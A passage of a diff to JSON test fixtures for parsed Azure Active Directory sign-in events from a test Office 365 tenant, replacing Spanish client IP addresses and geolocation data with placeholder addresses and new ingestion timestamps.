- } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3478,7 +3016,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -3528,7 +3066,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -3540,12 +3078,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051554400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:29\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e94002d9-f6e8-46f9-8702-2a29e908e73d\",\"InterSystemsId\":\"61eb5713-2687-4c00-a7b2-fde4788c395b\",\"IntraSystemId\":\"3db9a461-6dd1-4950-b3e3-fbe8c2d5c700\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970201500Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:29\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e94002d9-f6e8-46f9-8702-2a29e908e73d\",\"InterSystemsId\":\"61eb5713-2687-4c00-a7b2-fde4788c395b\",\"IntraSystemId\":\"3db9a461-6dd1-4950-b3e3-fbe8c2d5c700\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -3584,25 +3122,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3616,7 +3136,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -3666,7 +3186,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -3678,12 +3198,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051571600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"1ca4f684-3a34-44a8-99b8-064d1071768a\",\"InterSystemsId\":\"61f81224-65fd-4c1b-b388-ee0e25485191\",\"IntraSystemId\":\"dc0cc415-9a00-470d-bda3-867e11fdd400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970207100Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"1ca4f684-3a34-44a8-99b8-064d1071768a\",\"InterSystemsId\":\"61f81224-65fd-4c1b-b388-ee0e25485191\",\"IntraSystemId\":\"dc0cc415-9a00-470d-bda3-867e11fdd400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -3722,25 +3242,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3754,7 +3256,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -3804,7 +3306,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { @@ -3816,12 +3318,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051576700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2\",\"InterSystemsId\":\"661f2330-3e04-483d-9781-caaa4543cc13\",\"IntraSystemId\":\"01c15486-46e2-487a-91f5-11445da0b600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970212800Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2\",\"InterSystemsId\":\"661f2330-3e04-483d-9781-caaa4543cc13\",\"IntraSystemId\":\"01c15486-46e2-487a-91f5-11445da0b600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -3860,25 +3362,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -3892,7 +3376,7 @@ "ObjectId": "0f698dd4-f011-4d23-a33e-b36416dcb1e6", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -3942,7 +3426,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -3954,12 +3438,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051580100Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:42\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b290b902-b6f2-49f6-b7f8-ea1541d85c8c\",\"InterSystemsId\":\"68d7eaa4-aa57-4508-9792-09e80c911aa1\",\"IntraSystemId\":\"1590b91f-bffe-4cd8-9028-de52692f5400\",\"ModifiedProperties\":[],\"ObjectId\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970218500Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:42\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b290b902-b6f2-49f6-b7f8-ea1541d85c8c\",\"InterSystemsId\":\"68d7eaa4-aa57-4508-9792-09e80c911aa1\",\"IntraSystemId\":\"1590b91f-bffe-4cd8-9028-de52692f5400\",\"ModifiedProperties\":[],\"ObjectId\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -3998,25 +3482,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4030,7 +3496,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "RequestType": "Login:login" @@ -4079,7 +3545,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -4091,12 +3557,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051583Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:42:59\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"b0c1c4a7-c6db-4f14-b628-54e37a7a6785\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"f54da4fe-0a54-45f3-b6ea-39f873eb6000\",\"LogonError\":\"FlowTokenExpired\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970224100Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:42:59\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"b0c1c4a7-c6db-4f14-b628-54e37a7a6785\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"f54da4fe-0a54-45f3-b6ea-39f873eb6000\",\"LogonError\":\"FlowTokenExpired\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -4135,25 +3601,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -4167,7 +3615,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Failed", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "ResultStatusDetail": "Success", "UserAuthenticationMethod": "1", @@ -4218,7 +3666,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -4230,12 +3678,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051586400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"82d834e4-f6f2-476a-902e-e1e9fd6f87d8\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"7fa5e138-ac87-4063-a278-56c6c6965e00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970229600Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 